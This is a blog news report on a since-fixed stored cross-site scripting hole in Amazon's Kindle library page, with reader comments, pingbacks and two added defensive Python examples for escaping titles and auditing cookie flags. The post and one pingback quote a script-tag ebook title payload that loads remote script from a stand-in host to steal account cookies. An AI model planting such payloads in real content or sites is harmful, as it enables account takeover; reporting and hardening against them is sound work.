Your Amazon Account Can be Hacked via a Kindle eBook

Amazon might not have a security issue at Audible, but they do have one on their main website.

Update: And it has been fixed.

A security researcher has reported, and I can confirm, that Amazon has a security hole on the "Manage Your Kindle" page – one which is relatively easy to fix.

Thanks to this hole, a hacker can gain access to a victim's Amazon account simply by getting the victim to download an ebook whose title has been crafted to include a script:

Once an attacker manages to have an e-book (file, document, …) with a title like

<script src="https://www.example.org/script.js"></script>

added to the victim’s library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.
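The flaw described above is a stored cross-site scripting bug: the ebook title is attacker-controlled data, and the library page wrote it into the HTML verbatim, so the browser parsed it as markup. The following is an added example, not code from Amazon or from the researcher's write-up, showing a minimal "before" renderer next to the hardened one (HTML-escaping the title with Python's `html.escape`) and a small parser-based check that a reviewer could use to confirm the escaped output no longer contains a live `<script>` tag. The list-item markup and the `render_title_*` function names are assumptions made for the illustration; the title payload is the one quoted in the post.

```python
import html
from html.parser import HTMLParser

# Constructed sample: an e-book title carrying the payload quoted in the post.
MALICIOUS_TITLE = '<script src="https://www.example.org/script.js"></script>'


def render_title_unsafe(title: str) -> str:
    """'Before' rendering (hypothetical): the untrusted title is concatenated into
    the page as-is, so the browser treats it as markup and fetches the script."""
    return f'<li class="book">{title}</li>'


def render_title_safe(title: str) -> str:
    """Hardened rendering: escape <, >, &, and quotes into entities so the title is
    displayed as text and can never open a tag or break out of an attribute."""
    return f'<li class="book">{html.escape(title, quote=True)}</li>'


class _ScriptTagFinder(HTMLParser):
    """Collects the src attribute of every <script> start tag the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.script_srcs: list = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.script_srcs.append(dict(attrs).get("src"))


def find_script_tags(fragment: str) -> list:
    """Return the src values of script tags that an HTML parser actually recognises
    in the fragment. Escaped text yields an empty list because the entities are
    decoded into character data, not into tags."""
    finder = _ScriptTagFinder()
    finder.feed(fragment)
    finder.close()
    return finder.script_srcs


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_title_unsafe), ("safe", render_title_safe)):
        fragment = renderer(MALICIOUS_TITLE)
        print(f"{label:>6}: {fragment}")
        print(f"        script tags parsed: {find_script_tags(fragment)}")
```

The check deliberately runs the rendered output through a real HTML parser rather than searching for the substring `<script`, because encoding tricks that slip past substring matching still have to be interpreted by the parser to do any harm; a title such as `Pride & Prejudice` renders as `Pride &amp; Prejudice` and stays harmless either way.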

I’ve tried it, and it does work. I saw something similar to the image which the hacker posted to his blog.

As a result, I would urge caution against buying or downloading ebooks from untrustworthy sources – for the near future, at least. I expect Amazon will fix this problem shortly; that's what they did when it was first discovered last fall.

No, this is not a new story, though it is just coming to light. The German ebook blog AlleseBook.de broke the story earlier today when they reported on the hacker who discovered this issue – and, more importantly, provided an ebook which could prove the hack worked.

Benjamin Daniel Mussler writes that he discovered this security issue last October. He notified Amazon in November, and they fixed it 4 days later. That is great, but then Amazon reintroduced the security hole earlier this year when they launched the new version of the "Manage Your Kindle" page.

As of the time I wrote this post, Mussler's hack still worked. There's even an ebook which you can use to test the hack yourself, if you like. I would recommend against it, but it is up to you.

On a related note, if you’re worried about being hacked, there is a simple rule you can follow to keep yourself safe.

I have a rule against downloading apps from questionable websites, one which I have long since applied to Epub ebooks (because they can contain JavaScript) and PDFs (because they can hold entire apps). Now it would seem that rule needs to be expanded to include Kindle ebooks as well.

image by Pitel

Comments


Votre compte Amazon peut être cracké au travers d’un eBook | Quoi lire ? September 15, 2014 um 2:04 pm

[…] Original article on The Digital Reader […]


R September 15, 2014 um 7:48 pm

To prevent losing personal info because of hacking, I don’t provide any real info to Amazon (except my credit card no.). I only enter my credit card no. when I want to buy a book, (which I seldom do so). After buying it, I delete the no. It is just always dangerous to save any personal info online.

Skeptical September 21, 2014 um 1:27 pm

"I don’t provide any real info to Amazon (except my credit card no.)" I applaud your caution, but you should be a bit more realistic about it… For one, you had to give also your name and your billing address, or otherwise your CC wouldn’t have gone through. But more importantly, note that even in this very limited case, there is no report that credit card numbers were leaked: this should not be a surprise, because you can’t even see your *own* credit card numbers on Amazon.com (go take a look). So if someone "takes over your account", they *still* can’t see what your credit card numbers are. They also cannot change the shipping address that your account sends to, because this requires retyping your credit card number… which they don’t have. Likewise, they do not gain access to your password (this, too, is not shown to you on amazon.com).

Do not confuse a very limited exploit – recall this required you to download an ebook to your Kindle that has ".js" in it, which is kind of like saying that email is very dangerous if you click on attachments willy-nilly – with the kind of massive data breach that Home Depot and others have had.


dn September 16, 2014 um 3:10 am

Have always had a concern about the lack of security/protection on the Kindle. So with my Kindle+keyboard model, practice has been to download to computer and thence by USB cable to the device.


Authors Target Directors in Amazon-Hachette Dispute | Digital Book World September 16, 2014 um 8:17 am

[…] Ebook as Hacker Tool (The Digital Reader) Hackers have found a way to use ebooks to hack Amazon accounts. It’s an easy-to-fix loophole in Kindle security but scary nonetheless. […]


Rogue E-Books Could Pose Threat to Amazon Accounts | Malwarebytes Unpacked September 16, 2014 um 9:31 am

[…] a writeup by someone demonstrating the researcher’s proof of concept test on themselves, passing with […]


Hackers make the case for trusting Amazon’s and Apple’s “walled gardens” | PandoDaily September 16, 2014 um 10:00 am

[…] was purchased instead of pirated. That’s where the problems like attackers getting access to your Amazon account — which bears your address, and credit card information — come […]


Kindle security flaw can be exploited by hidden codes in e-books | Sprestige.com September 16, 2014 um 11:19 am

[…] Via: The Digital Reader […]


Leer un libro en tu Kindle puede hackear tu cuenta de Amazon | Francisco Unica September 16, 2014 um 1:26 pm

[…] information | The Digital Reader | B.FL7.DE On Genbeta | Some basic computer security concepts you should […]


Researchers Create A Kindle eBook That Can Hack Your Amazon Account | TechCrunch September 16, 2014 um 3:42 pm

[…] via TheDigitalReader […]


McGroarty September 16, 2014 um 4:00 pm

This is potentially made worse by the fact that most of the cookies on Amazon’s site are not flagged Http-only. If a cookie is not flagged Http-only, it can be read by scripts. I see two different session tokens on my account, one of which is protected and one of which is not.
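The point raised in this comment is checkable from the response headers alone: a cookie issued without the `HttpOnly` attribute is exposed to any script running in the page, so an XSS like the one in the post can read it, whereas an `HttpOnly` cookie is still sent with requests but is invisible to `document.cookie`. The block below is an added example, not code from the commenter or from Amazon, that parses `Set-Cookie` headers and reports which cookies a defender should flag. The header values and cookie names are constructed samples; they mirror the commenter's observation of one protected and one unprotected session token rather than reflecting any real Amazon cookie.

```python
# Constructed sample Set-Cookie headers, modelled on the commenter's observation:
# two session tokens, one of which carries HttpOnly (and Secure) and one of which does not.
SAMPLE_SET_COOKIE_HEADERS = [
    "session_token_protected=tok-AAAA; Path=/; Secure; HttpOnly",
    "session_token_exposed=tok-BBBB; Path=/",
    "ui_prefs=dark; Path=/; Max-Age=31536000; Secure",
]


def parse_set_cookie(header_value: str) -> dict:
    """Split one Set-Cookie header value into its name, value, and attributes.
    Flag attributes such as HttpOnly and Secure map to True; attributes with a
    value (Path, Max-Age, ...) keep their string. Attribute names are lowercased
    because the cookie spec treats them case-insensitively."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def visible_to_script(headers: list) -> list:
    """Names of cookies that page scripts can read: everything not marked HttpOnly.
    This is the set an XSS payload could exfiltrate."""
    return [
        c["name"]
        for c in map(parse_set_cookie, headers)
        if "httponly" not in c["attrs"]
    ]


def audit_cookies(headers: list) -> list:
    """Return (cookie name, missing attributes) for every cookie that lacks
    HttpOnly or Secure, in header order. An empty list means all cookies carry
    both attributes."""
    findings = []
    for cookie in map(parse_set_cookie, headers):
        missing = [flag for flag in ("HttpOnly", "Secure") if flag.lower() not in cookie["attrs"]]
        if missing:
            findings.append((cookie["name"], missing))
    return findings


if __name__ == "__main__":
    print("readable by scripts:", visible_to_script(SAMPLE_SET_COOKIE_HEADERS))
    for name, missing in audit_cookies(SAMPLE_SET_COOKIE_HEADERS):
        print(f"{name}: missing {', '.join(missing)}")
```

Marking a session cookie `HttpOnly` does not fix the underlying XSS, since an injected script can still issue requests in the victim's session from inside the page, but it does remove the simplest outcome the researcher described: the cookies being copied out to the attacker's server.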


A Kindle E-Book Flaw Lets Hackers Access Your Amazon Account September 16, 2014 um 5:36 pm

[…] Read the full story at The Digital Reader. […]


Your Amazon Account Can Be Hacked Via A Malicious Kindle Ebook | Gizmodo Australia September 16, 2014 um 9:16 pm

[…] According to The Digital Reader, a hacker can gain access to your Amazon account by simply getting you to download an ebook file, which itself was hacked to include a script like <script src="https://www.example.org/script.js"></script> in the title. […]


Yahoo, Kindle, Music, Mathematica, More: Evening Buzz, September 17th, 2014 | ResearchBuzz September 17, 2014 um 6:52 pm

[…] your Kindle is vulnerable to hacking by dodgy ebooks. And by “hacking,” I mean, “Your account gets stolen.” Amazon, tell me […]


Tom Semple September 19, 2014 um 4:30 pm

Apparently Amazon has patched this up. I wonder if anyone’s tried a similar hack with Google Play Books. One is able to upload ePub files, and even read them in a browser, which might present a big surface area to attack. Don’t remember if Google’s ePub3 support includes JavaScript support.


Your Amazon Account Can Be Hacked Via a Malicious Kindle Ebook | Rob's Personal Aggregator September 20, 2014 um 11:37 pm

[…] Kindle ebooks from dubious sources aka anywhere other than Amazon, watch out. A security researcher has discovered a security hole in the “Manage Your Kindle” page on Amazon’s website that outs […]


Un hacker podría acceder a la cuenta de Amazon a través de un e-book pirateado September 24, 2014 um 3:32 am

[…] according to ‘The Digital Reader’, a hacker can gain access to an Amazon account simply by downloading a file from […]


Tuesday 16th of September | September 24, 2014 um 9:47 am

[…] Full Story at The Digital Reader […]


Adobe is Spying on Users, Collecting Data on Their eBook Libraries – The Digital Reader October 6, 2014 um 6:04 pm

[…] this happen, and I can also tell you that Benjamin Daniel Mussler, the security researcher who found the security hole on Amazon.com, has also tested this at my request and saw it with his own […]


WTFery – Adobe collecting user data via Digital Editions, malicious ebook code, & more. | TymberDalton.com October 7, 2014 um 10:37 am

[…] in that article he also references an Amazon vulnerability, that was closed, opened again when Amazon made a site update, and then subsequently closed again, […]


The End is Near (and we deserve it) . . . City Pays Alcoholics with Beer « Bayard & Holmes October 10, 2014 um 3:05 pm

[…] Your Amazon Account Can Be Hacked Via a Kindle eBook, via author and heckuva guy Nigel Blackwell. […]


Cybercrime: The Net Was Not Built For Privacy | anna johnson-hill October 19, 2014 um 7:23 am

[…] ‘walled garden’ (Zittrain 2008). In reality, hackers are able to surpass these boundaries. A flaw was found in Amazon’s walled garden through the ‘Manage Your Kindle’ page which enables the hacker to […]


Amazon-Sicherheitslücke: Manipulierte E-Books als Hintertür › ifun.de December 8, 2015 um 11:47 am

[…] (via Digital Reader) […]


A Look at Amazon: Timeline and Indie Author News March 13, 2017 um 1:06 pm

[…] “Your Amazon Account Can be Hacked via a Kindle eBook” on The Digital Reader […]

